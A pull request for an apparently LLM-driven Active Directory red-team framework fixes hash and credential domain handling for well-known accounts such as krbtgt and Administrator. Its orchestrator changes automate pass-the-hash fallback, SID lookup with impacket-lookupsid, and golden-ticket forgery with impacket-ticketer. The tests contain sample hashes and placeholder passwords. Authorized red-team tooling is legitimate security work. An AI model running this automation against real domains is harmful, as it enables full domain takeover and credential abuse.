### PR TITLE
fix: prevent domain normalization for well-known accounts in Active Directory

### DIFF
--- a/src/ares/core/models.py
+++ b/src/ares/core/models.py
@@ -52,6 +52,19 @@ def _get_uuid() -> str:
 # Default retry count for tasks - exported for test compatibility
 DEFAULT_MAX_RETRIES = 3
 
+# Well-known accounts that exist in EVERY Active Directory domain.
+# These accounts (Administrator, krbtgt, Guest, etc.) have the same username in every
+# domain but are completely different accounts with different hashes/passwords.
+# Domain normalization MUST NOT change domains for these accounts.
+WELL_KNOWN_ACCOUNTS: frozenset[str] = frozenset(
+    {
+        "krbtgt",
+        "administrator",
+        "guest",
+        "defaultaccount",
+    }
+)
+
 __all__ = [
     "DEFAULT_MAX_RETRIES",
     "AgentInfo",
@@ -1654,11 +1667,8 @@ class SharedRedTeamState:
         domain_lower = domain.lower()
 
         # CRITICAL: Never correct domain for well-known accounts that exist in EVERY domain.
-        # These accounts (krbtgt, Administrator, Guest, etc.) have the same username in every
-        # domain but are completely different accounts with different hashes/passwords.
         # "Correcting" their domain based on user lookups is ALWAYS wrong.
-        well_known_accounts = {"krbtgt", "administrator", "guest", "defaultaccount"}
-        if username_lower in well_known_accounts:
+        if username_lower in WELL_KNOWN_ACCOUNTS:
             logger.debug(
                 f"Domain kept as-is (well-known account): {domain_lower}\\{username_lower} "
                 f"(never correct well-known accounts, source: {source_agent})"
@@ -1789,6 +1799,15 @@ class SharedRedTeamState:
 
         username_lower = username.lower()
         provided_lower = provided_domain.lower()
+
+        # CRITICAL: Never correct domain for well-known accounts that exist in EVERY domain.
+        # "Correcting" their domain based on user lookups is ALWAYS wrong.
+        if username_lower in WELL_KNOWN_ACCOUNTS:
+            logger.debug(
+                f"Domain kept as-is (well-known account): {provided_domain}\\{username} "
+                "(never correct well-known accounts)"
+            )
+            return provided_domain
 
         # Find all domains where this user exists
         user_domains: list[str] = []
@@ -2371,6 +2390,11 @@ class SharedRedTeamState:
 
         # Users that are ONLY in child domain (not in parent)
         child_only_users = users_in_child - users_in_parent
+
+        # CRITICAL: Exclude well-known accounts that exist in EVERY domain.
+        # "Correcting" their domain based on user enumeration is ALWAYS wrong.
+        # See also: _validate_hash_domain() and normalize_hash_domains_to_users()
+        child_only_users -= WELL_KNOWN_ACCOUNTS
 
         if not child_only_users:
             return
@@ -3513,6 +3537,12 @@ class SharedRedTeamState:
             username_lower = creds[0].username.lower()
             domains_for_user = user_domains.get(username_lower, set())
 
+            # CRITICAL: Never normalize/dedupe well-known accounts across domains.
+            # They exist in EVERY domain with the same name but different passwords.
+            if username_lower in WELL_KNOWN_ACCOUNTS:
+                normalized.extend(creds)  # Keep all well-known account credentials
+                continue
+
             if len(creds) == 1:
                 # Only one credential for this username:password
                 cred = creds[0]
@@ -3625,7 +3655,7 @@ class SharedRedTeamState:
             hash_domain = (hash_obj.domain or "").lower()
 
             # Skip well-known accounts that exist in every domain
-            if username_lower in {"krbtgt", "administrator", "guest", "defaultaccount"}:
+            if username_lower in WELL_KNOWN_ACCOUNTS:
                 # Still dedupe by hash value
                 dedup_key = f"{hash_domain}:{username_lower}:{hash_obj.hash_value}"
                 if dedup_key not in seen_hashes:

--- a/src/ares/core/orchestrator/_orchestrator.py
+++ b/src/ares/core/orchestrator/_orchestrator.py
@@ -3220,8 +3220,10 @@ async def _auto_golden_ticket(
                 )
 
                 # Need a credential or hash to run lookupsid
-                # Priority: same-domain password > same-domain hash > cross-domain password > cross-domain hash
-                # Cross-domain auth often fails for SID lookup, so prefer same-domain creds
+                # Priority: same-domain password > ANY password > same-domain hash > any hash
+                # Password credentials are more reliable than hashes because hash domains
+                # can be incorrectly assigned due to hostname/state sync race conditions.
+                # Cross-domain password auth works via trust relationships.
                 cred = None
                 auth_hash = None
 
@@ -3231,7 +3233,14 @@ async def _auto_golden_ticket(
                         cred = c
                         break
 
-                # 2. Try same-domain NTLM hash (PTH) - more reliable than cross-domain password
+                # 2. Try ANY password credential (cross-domain auth works via trust)
+                if not cred:
+                    for c in state.all_credentials:
+                        if c.password:
+                            cred = c
+                            break
+
+                # 3. Try same-domain NTLM hash (PTH) - less reliable, domain may be wrong
                 if not cred:
                     for h in state.all_hashes:
                         if h.hash_type.lower() != "ntlm":
@@ -3246,13 +3255,6 @@ async def _auto_golden_ticket(
                                 f"🎫 Auto-golden-ticket: Using same-domain hash for {domain}: "
                                 f"{h.domain}\\{h.username}"
                             )
-                            break
-
-                # 3. Try any password credential (cross-domain auth may work)
-                if not cred and not auth_hash:
-                    for c in state.all_credentials:
-                        if c.password:
-                            cred = c
                             break
 
                 # 4. Try any NTLM hash (cross-domain PTH as last resort)
@@ -3351,6 +3353,46 @@ async def _auto_golden_ticket(
 
                     # Parse domain SID from output
                     sid_match = re.search(r"Domain SID is:\s*(S-\d+-\d+-\d+-\d+-\d+-\d+)", output)
+
+                    # If PTH failed with LOGON_FAILURE, try password credentials as fallback
+                    # This handles cases where hash is from wrong domain due to state sync issues
+                    if (
+                        not sid_match
+                        and "STATUS_LOGON_FAILURE" in output
+                        and auth_hash
+                        and not cred
+                    ):
+                        logger.warning(
+                            f"🎫 Auto-golden-ticket: PTH failed for {domain}, trying password fallback"
+                        )
+                        # Find any password credential (cross-domain auth via trust)
+                        for c in state.all_credentials:
+                            if c.password:
+                                cred = c
+                                break
+                        if cred:
+                            cmd = [
+                                "impacket-lookupsid",
+                                f"{cred.domain}/{cred.username}:{cred.password}@{dc_ip}",
+                            ]
+                            logger.info(
+                                f"🎫 Auto-golden-ticket: Retrying lookupsid with password for "
+                                f"{cred.domain}\\{cred.username}"
+                            )
+                            try:
+                                stdout, stderr, _ = _run_lookupsid_with_retry(
+                                    cmd, timeout_seconds=60
+                                )
+                                output = stdout + "\n" + (stderr or "")
+                                output_preview = (
+                                    output[:300].replace("\n", "\\n") if output else "<empty>"
+                                )
+                                sid_match = re.search(
+                                    r"Domain SID is:\s*(S-\d+-\d+-\d+-\d+-\d+-\d+)", output
+                                )
+                            except (TransientToolError, RetryError):
+                                pass  # Fall through to failure handling
+
                     if not sid_match:
                         # Lookupsid ran but couldn't extract SID - this is a permanent failure
                         # (bad creds, wrong domain, etc.)
@@ -3377,11 +3419,16 @@ async def _auto_golden_ticket(
                     logger.info(f"🎫 Auto-golden-ticket: Got domain SID {domain_sid} for {domain}")
 
                     # Generate golden ticket
+                    # Extract just the NT hash if in LM:NT format
+                    krbtgt_nt_hash = hash_obj.hash_value
+                    if ":" in krbtgt_nt_hash:
+                        krbtgt_nt_hash = krbtgt_nt_hash.split(":")[-1]
+
                     ticket_path = "Administrator.ccache"
                     cmd = [
                         "impacket-ticketer",
                         "-nthash",
-                        hash_obj.hash_value,
+                        krbtgt_nt_hash,
                         "-domain-sid",
                         domain_sid,
                         "-domain",

--- a/src/ares/tools/red/credential_discovery/harvesting.py
+++ b/src/ares/tools/red/credential_discovery/harvesting.py
@@ -226,6 +226,19 @@ class CredentialHarvestingTools(Toolset):
             resolved_password = None
         if resolved_password and resolved_password.strip().lower() in self._PLACEHOLDER_PASSWORDS:
             return "[!] Refusing to use placeholder password; provide a real credential."
+
+        # CRITICAL: If target is FQDN, derive domain from it for accurate hash parsing.
+        # The LLM might pass wrong domain (e.g., parent domain when targeting child DC).
+        # For dc01.child.contoso.local -> child.contoso.local
+        if not re.match(r"^\d{1,3}(\.\d{1,3}){3}$", target):
+            # Target is FQDN, extract domain
+            target_parts = target.lower().split(".")
+            if len(target_parts) >= 3:
+                derived_domain = ".".join(target_parts[1:])
+                if domain and derived_domain != domain.lower():
+                    logger.info(f"Domain corrected from target FQDN: {domain} -> {derived_domain}")
+                domain = derived_domain
+
         if self.state and hasattr(self.state, "add_domain") and domain:
             self.state.add_domain(domain)
 

--- a/src/ares/tools/red/lateral_movement.py
+++ b/src/ares/tools/red/lateral_movement.py
@@ -617,6 +617,10 @@ class LateralMovementTools(Toolset):
                 f"→ Use the hostname instead, e.g., 'dc01.{domain}' instead of '{target}'"
             )
 
+        # NOTE: Do NOT derive domain from target FQDN here. For Kerberos ticket auth,
+        # the domain must match what's encoded in the ccache ticket. Overwriting it
+        # would break golden ticket authentication.
+
         actual_ticket = ticket_path or f"{username}.ccache"
         target_string = f"{domain}/{username}@{target}"
 

--- a/tests/core/test_models.py
+++ b/tests/core/test_models.py
@@ -1643,6 +1643,216 @@ class TestRetroactiveDomainNormalization:
         # Credential domain should remain unchanged
         assert state.all_credentials[0].domain == "contoso"
 
+    def test_parent_child_normalize_excludes_well_known_accounts(self) -> None:
+        """Test that parent->child normalization does NOT affect well-known accounts.
+
+        CRITICAL BUG FIX: Well-known accounts (Administrator, krbtgt, Guest, etc.)
+        exist in EVERY domain with the same name but different hashes.
+        We must NOT reassign their hashes based on incomplete user enumeration.
+
+        Scenario that was broken:
+        1. Secretsdump on contoso.local gets Administrator hash
+        2. User enumeration only finds Administrator in child.contoso.local
+        3. BUG: Administrator hash gets wrongly normalized to child.contoso.local
+        4. Golden ticket PTH fails because hash is for parent, not child
+        """
+        from ares.core.models import Hash, SharedRedTeamState
+
+        state = SharedRedTeamState(operation_id="test-op")
+
+        # Add parent domain first
+        state.add_domain("contoso.local")
+
+        # Add Administrator hash for parent domain (from secretsdump on parent DC)
+        admin_hash = Hash(
+            username="Administrator",
+            hash_value="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0",
+            hash_type="NTLM",
+            domain="contoso.local",
+        )
+        state.add_hash(admin_hash, "secretsdump")
+
+        # Add krbtgt hash for parent domain
+        krbtgt_hash = Hash(
+            username="krbtgt",
+            hash_value="aad3b435b51404eeaad3b435b51404ee:abcdef1234567890abcdef1234567890",
+            hash_type="NTLM",
+            domain="contoso.local",
+        )
+        state.add_hash(krbtgt_hash, "secretsdump")
+
+        # Add a regular user hash that SHOULD be normalized (when child domain discovered)
+        regular_hash = Hash(
+            username="sql_svc",
+            hash_value="aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef",
+            hash_type="NTLM",
+            domain="contoso.local",
+        )
+        state.add_hash(regular_hash, "secretsdump")
+
+        # Add user for sql_svc ONLY in child domain - this will trigger add_domain
+        # for child.contoso.local, which triggers parent->child normalization
+        state.add_user("sql_svc", "child.contoso.local", "bloodhound")
+
+        # Verify: Regular user hash SHOULD be normalized to child domain
+        # (since sql_svc was only seen in child domain at time of normalization)
+        regular_hashes = [h for h in state.all_hashes if h.username.lower() == "sql_svc"]
+        assert len(regular_hashes) == 1
+        assert regular_hashes[0].domain == "child.contoso.local", (
+            f"Regular user hash should be normalized, got {regular_hashes[0].domain}"
+        )
+
+        # Now add Administrator only in child domain (simulates incomplete enumeration)
+        # Note: This won't re-trigger normalization since child domain already added
+        state.add_user("administrator", "child.contoso.local", "bloodhound")
+
+        # Verify: Administrator hash must stay in parent domain (not affected)
+        admin_hashes = [h for h in state.all_hashes if h.username.lower() == "administrator"]
+        assert len(admin_hashes) == 1
+        assert admin_hashes[0].domain == "contoso.local", (
+            f"Administrator hash incorrectly normalized to {admin_hashes[0].domain}"
+        )
+
+        # Verify: krbtgt hash must stay in parent domain
+        krbtgt_hashes = [h for h in state.all_hashes if h.username.lower() == "krbtgt"]
+        assert len(krbtgt_hashes) == 1
+        assert krbtgt_hashes[0].domain == "contoso.local", (
+            f"krbtgt hash incorrectly normalized to {krbtgt_hashes[0].domain}"
+        )
+
+    def test_parent_child_normalize_excludes_administrator_at_discovery(self) -> None:
+        """Test that Administrator hash is NOT normalized even when it's the first user found.
+
+        This simulates the exact bug scenario:
+        1. Secretsdump on parent DC gets Administrator hash
+        2. BloodHound finds Administrator user in child domain (before parent enumeration)
+        3. child domain is added -> triggers normalization
+        4. Administrator hash must NOT be moved to child domain
+        """
+        from ares.core.models import Hash, SharedRedTeamState
+
+        state = SharedRedTeamState(operation_id="test-op")
+
+        # Setup parent domain and Administrator hash
+        state.add_domain("contoso.local")
+        admin_hash = Hash(
+            username="Administrator",
+            hash_value="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0",
+            hash_type="NTLM",
+            domain="contoso.local",
+        )
+        state.add_hash(admin_hash, "secretsdump")
+
+        # First user discovery is Administrator in child domain
+        # This triggers add_domain("child.contoso.local") and normalization
+        state.add_user("administrator", "child.contoso.local", "bloodhound")
+
+        # Verify: Administrator hash stays in parent domain
+        admin_hashes = [h for h in state.all_hashes if h.username.lower() == "administrator"]
+        assert len(admin_hashes) == 1
+        assert admin_hashes[0].domain == "contoso.local", (
+            f"BUG: Administrator hash incorrectly normalized to {admin_hashes[0].domain}"
+        )
+
+    def test_resolve_credential_domain_excludes_well_known_accounts(self) -> None:
+        """Test that _resolve_credential_domain_from_users does NOT correct well-known accounts.
+
+        Well-known accounts (Administrator, krbtgt, Guest) exist in EVERY domain.
+        We must NOT reassign their credentials based on user enumeration.
+        """
+        from ares.core.models import SharedRedTeamState
+
+        state = SharedRedTeamState(operation_id="test-op")
+
+        # Add users only in child domain (simulate incomplete enumeration)
+        state.add_user("administrator", "child.contoso.local", "bloodhound")
+        state.add_user("krbtgt", "child.contoso.local", "bloodhound")
+        state.add_user("sql_svc", "child.contoso.local", "bloodhound")
+
+        # Test: Administrator credential from parent domain should NOT be corrected
+        admin_resolved = state._resolve_credential_domain_from_users(
+            "administrator", "contoso.local"
+        )
+        assert admin_resolved == "contoso.local", (
+            f"Administrator domain incorrectly resolved to {admin_resolved}"
+        )
+
+        # Test: krbtgt credential from parent domain should NOT be corrected
+        krbtgt_resolved = state._resolve_credential_domain_from_users("krbtgt", "contoso.local")
+        assert krbtgt_resolved == "contoso.local", (
+            f"krbtgt domain incorrectly resolved to {krbtgt_resolved}"
+        )
+
+        # Test: Regular user SHOULD be corrected to child domain
+        sql_svc_resolved = state._resolve_credential_domain_from_users("sql_svc", "contoso.local")
+        assert sql_svc_resolved == "child.contoso.local", (
+            f"sql_svc should be resolved to child domain, got {sql_svc_resolved}"
+        )
+
+    def test_normalize_credential_domains_excludes_well_known_accounts(self) -> None:
+        """Test that normalize_credential_domains_to_users keeps all well-known credentials.
+
+        When we have Administrator/krbtgt from multiple domains, they are DIFFERENT
+        accounts and must ALL be kept, not deduplicated.
+        """
+        from ares.core.models import Credential, SharedRedTeamState
+
+        state = SharedRedTeamState(operation_id="test-op")
+
+        # Add Administrator credentials from both parent and child domains
+        # These are different accounts with (presumably) different passwords
+        cred1 = Credential(
+            username="Administrator",
+            password="ParentPass123!",  # pragma: allowlist secret
+            domain="contoso.local",
+            source="secretsdump",
+        )
+        cred2 = Credential(
+            username="Administrator",
+            password="ChildPass456!",  # pragma: allowlist secret
+            domain="child.contoso.local",
+            source="secretsdump",
+        )
+        # Add a regular user with duplicates (SHOULD be deduplicated)
+        cred3 = Credential(
+            username="sql_svc",
+            password="SqlPass789!",  # pragma: allowlist secret
+            domain="contoso.local",
+            source="source1",
+        )
+        cred4 = Credential(
+            username="sql_svc",
+            password="SqlPass789!",  # pragma: allowlist secret
+            domain="child.contoso.local",
+            source="source2",
+        )
+
+        # Manually add to bypass add_credential deduplication
+        state.all_credentials = [cred1, cred2, cred3, cred4]
+
+        # Add user only in child domain
+        state.add_user("sql_svc", "child.contoso.local", "bloodhound")
+
+        # Run normalization
+        state.normalize_credential_domains_to_users()
+
+        # Verify: Both Administrator credentials are kept (different accounts)
+        admin_creds = [c for c in state.all_credentials if c.username.lower() == "administrator"]
+        assert len(admin_creds) == 2, (
+            f"Both Administrator creds should be kept, got {len(admin_creds)}"
+        )
+        admin_domains = {c.domain for c in admin_creds}
+        assert admin_domains == {"contoso.local", "child.contoso.local"}, (
+            f"Expected both domains, got {admin_domains}"
+        )
+
+        # Verify: sql_svc should be deduplicated to child domain only
+        sql_creds = [c for c in state.all_credentials if c.username.lower() == "sql_svc"]
+        assert len(sql_creds) == 1, f"sql_svc should be deduplicated, got {len(sql_creds)}"
+        assert sql_creds[0].domain == "child.contoso.local", (
+            f"sql_svc should be in child domain, got {sql_creds[0].domain}"
+        )
+
 
 class TestDomainAdminAutoDetection:
     """Tests for automatic domain admin detection via hash analysis.


### PR DESCRIPTION

**Key Changes:**

- Prevent domain normalization and deduplication for well-known AD accounts
- Centralize well-known account definitions for consistent logic
- Add regression tests to ensure correct handling of well-known accounts
- Improve reliability of credential and hash normalization between domains

**Added:**

- Central definition of well-known AD accounts (`WELL_KNOWN_ACCOUNTS`) to ensure
  accounts like Administrator, krbtgt, Guest, and DefaultAccount are handled
  consistently across normalization logic in the codebase
- Multiple regression tests in `TestRetroactiveDomainNormalization` to verify
  that normalization and deduplication logic does not incorrectly modify domains
  for well-known accounts or lose distinct credentials/hashes for these accounts

**Changed:**

- Domain normalization logic in `SharedRedTeamState` to always skip
  well-known accounts during:
    - Parent/child domain normalization of hashes
    - Credential deduplication and normalization
    - Domain inference from user enumeration
- Replaced local, ad-hoc well-known account sets with the centralized
  `WELL_KNOWN_ACCOUNTS` variable for reliability and maintainability
- Updated fallback logic in `_auto_golden_ticket` to retry with password
  credentials if hash-based authentication fails, improving SID lookup
  reliability in state sync edge cases
- In credential harvesting, added logic to derive the domain from the target
  FQDN to improve accuracy when LLMs or users provide mismatched domains

**Removed:**

- Redundant, inline definitions of well-known account sets in several methods,
  consolidating checks to use the single `WELL_KNOWN_ACCOUNTS` reference
- Unreliable normalization and deduplication for well-known accounts, ensuring
  unique accounts in each domain are preserved and not merged or reassigned